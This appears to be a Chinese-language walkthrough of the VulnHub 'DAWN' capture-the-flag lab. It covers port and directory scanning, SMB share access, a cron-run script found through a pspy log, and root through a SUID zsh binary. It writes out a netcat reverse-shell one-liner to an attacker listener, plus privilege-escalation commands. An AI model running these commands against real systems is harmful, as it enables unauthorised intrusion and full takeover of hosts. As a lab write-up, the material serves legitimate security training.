vulnhub靶机 |
您所在的位置:网站首页 › iqz3官网 › vulnhub靶机 |
vulnhub靶机
|
1、找到靶机ip:192.168.0.123 nmap 192.168.0.0/24
2、扫描靶机端口 root@kali:~# nmap -A -p- 192.168.0.123 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.123 Host is up (0.0090s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP) 3306/tcp open mysql MySQL 5.5.5-10.3.15-MariaDB-1 | mysql-info: | Protocol: 10 | Version: 5.5.5-10.3.15-MariaDB-1 | Thread ID: 14 | Capabilities flags: 63486 | Some Capabilities: LongColumnFlag, Support41Auth, FoundRows, InteractiveClient, SupportsTransactions, Speaks41ProtocolOld, ODBCClient, Speaks41ProtocolNew, IgnoreSigpipes, DontAllowDatabaseTableColumn, SupportsCompression, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments | Status: Autocommit | Salt: _R`iqz3,"dUZC$'7{-iL |_ Auth Plugin Name: mysql_native_password MAC Address: 08:00:27:45:9B:22 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: Host: DAWN Host script results: |_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: -1s |_nbstat: NetBIOS name: DAWN, NetBIOS user: , NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.9.5-Debian) | Computer name: dawn | NetBIOS computer name: DAWN\x00 | Domain name: dawn | FQDN: dawn.dawn |_ System time: 2020-07-16T06:39:06-04:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-07-16T10:39:06 |_ start_date: N/A TRACEROUTE HOP RTT ADDRESS 1 8.97 ms 192.168.0.123 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 33.80 seconds3、访问80端口,首页没有发现有用的东西
4、先放着,直接看看445端口,因为只有当445端口断开时,才会转发给139端口,使用smb连接,两种方法 第一种:使用命令连接 445端口 root@kali:~# smbclient -L //192.168.0.123 Enter WORKGROUP\root's password: Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers ITDEPT Disk PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY. IPC$ IPC IPC Service (Samba 4.9.5-Debian) SMB1 disabled -- no workgroup available root@kali:~# smbclient //192.168.0.123/ITDEPT Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Sat Aug 3 11:23:20 2019 .. D 0 Sat Aug 3 11:21:39 2019 7158264 blocks of size 1024. 3387808 blocks available smb: \>没有什么内容 第二种:使用文件夹图像化连接 445端口
这里就先放着,转而回去看80端口 5、扫描目录 root@kali:~# gobuster dir --url http://192.168.0.123/ --wordlist /usr/share/wordlists/dirb/big.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.0.123/ [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/07/16 18:49:32 Starting gobuster =============================================================== /.htaccess (Status: 403) /.htpasswd (Status: 403) /cctv (Status: 301) /logs (Status: 301) /server-status (Status: 403) =============================================================== Finished =============================================================== root@kali:~#cctv访问是403
logs访问有4个日志文件
前三个文件都是403
最后一个可以访问,挑几条重要的放在这里 2020/07/15 21:48:27 [31;1mCMD: UID=0 PID=462 | /bin/sh -c /root/pspy64 > /var/www/html/logs/management.log [0m pspy64不就是之前用来查看后台进程的工具嘛,这个文件保存的就是当前运行的后台进程了,每隔一分钟执行一次 2020/07/16 07:13:02 [31;1mCMD: UID=0 PID=2034 | chmod 777 /home/dawn/ITDEPT/product-control [0m 2020/07/16 07:14:01 [31;1mCMD: UID=??? PID=2050 | chmod 777 /home/dawn/ITDEPT/product-control [0m ITDEPT这不就是前面smb服务的文件夹么,每隔一分钟给product-control文件赋予777权限 2020/07/15 21:53:01 [31;1mCMD: UID=1000 PID=983 | /bin/sh -c /home/dawn/ITDEPT/product-control [0m 2020/07/15 21:54:01 [31;1mCMD: UID=1000 PID=1015 | /bin/sh -c /home/dawn/ITDEPT/product-control [0m 每隔一分钟执行一次 2020/07/15 21:54:01 [31;1mCMD: UID=0 PID=1014 | chmod 777 /home/dawn/ITDEPT/web-control [0m 2020/07/15 21:55:01 [31;1mCMD: UID=0 PID=1026 | chmod 777 /home/dawn/ITDEPT/web-control [0m 2020/07/15 21:55:01 [31;1mCMD: UID=33 PID=1031 | /bin/sh -c /home/dawn/ITDEPT/web-control [0m 2020/07/15 21:56:02 [31;1mCMD: UID=33 PID=1046 | /bin/sh -c /home/dawn/ITDEPT/web-control [0m 这个web-control文件和上面那个product-control文件一样,每隔一分钟被赋予777权限,每隔一分钟运行两个文件中挑一个文件进行利用(这里我选用product-control),在本地新建该文件,写入反弹shell一句话,本地开启监听,smb连接,将该文件上传到靶机 root@kali:~# echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.107 4444 >/tmp/f' >product-control
6、使用sudo -l查看到可以使用root身份免密执行mysql命令,python提权到tty $ sudo -l Matching Defaults entries for dawn on dawn: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User dawn may run the following commands on dawn: (root) NOPASSWD: /usr/bin/mysql $ python -c 'import pty;pty.spawn("/bin/bash")' dawn@dawn:~$7、想使用mysql命令提权,但是不知道密码,爆破错误次数太多就不给连接了,所以得想另外一种办法,查找拥有suid权限的命令,发现zsh命令,一个现成的shell,直接运行拿到root权限,拿到flag dawn@dawn:~$ find / -perm -4000 2>/dev/null find / -perm -4000 2>/dev/null /usr/sbin/mount.cifs /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/bin/su /usr/bin/newgrp /usr/bin/pkexec /usr/bin/passwd /usr/bin/sudo /usr/bin/mount /usr/bin/zsh /usr/bin/gpasswd /usr/bin/chsh /usr/bin/umount /usr/bin/chfn /home/dawn/ITDEPT dawn@dawn:~$ zsh zsh dawn# whoami whoami root dawn# cd /root cd /root dawn# ls ls flag.txt pspy64 dawn# cat flag.txt cat flag.txt Hello! whitecr0wz here. I would like to congratulate and thank you for finishing the ctf, however, there is another way of getting a shell(very similar though). Also, 4 other methods are available for rooting this box! flag{3a3e52f0a6af0d6e36d7c1ced3a9fd59} dawn# |
【本文地址】